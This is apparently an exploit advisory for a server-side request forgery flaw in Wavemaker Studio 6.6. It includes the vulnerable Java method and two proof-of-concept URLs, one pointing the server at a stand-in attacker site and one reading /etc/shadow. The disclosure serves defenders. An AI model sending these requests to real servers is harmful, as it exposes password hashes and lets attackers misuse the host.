35 lines
No EOL
1.4 KiB
Text
35 lines
No EOL
1.4 KiB
Text
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
|
|
# Exploit Author: Gionathan "John" Reale
|
|
# Google Dork: N/A
|
|
# Date: 2018-08-01
|
|
# Vendor Homepage: http://www.wavemaker.com/
|
|
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
|
|
# Affected Version: 6.6
|
|
# Tested on: Parrot OS
|
|
# CVE : 2019-8982
|
|
|
|
# Description
|
|
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
|
|
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
|
|
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
|
|
# as a form of HTTP proxy among other things.
|
|
|
|
# Proof Of Concept
|
|
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
|
|
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
|
|
|
|
# Vulnerable Code
|
|
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
|
|
|
|
# Line 419-430
|
|
@ExposeToClient
|
|
public String getContent(String inUrl) throws IOException {
|
|
try {
|
|
String str = getRemoteContent(inUrl);
|
|
str = str.replace("<head>", "<head><base href='" + inUrl
|
|
+ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
|
|
return str;
|
|
} catch (Exception e) {
|
|
return "";
|
|
}
|
|
} |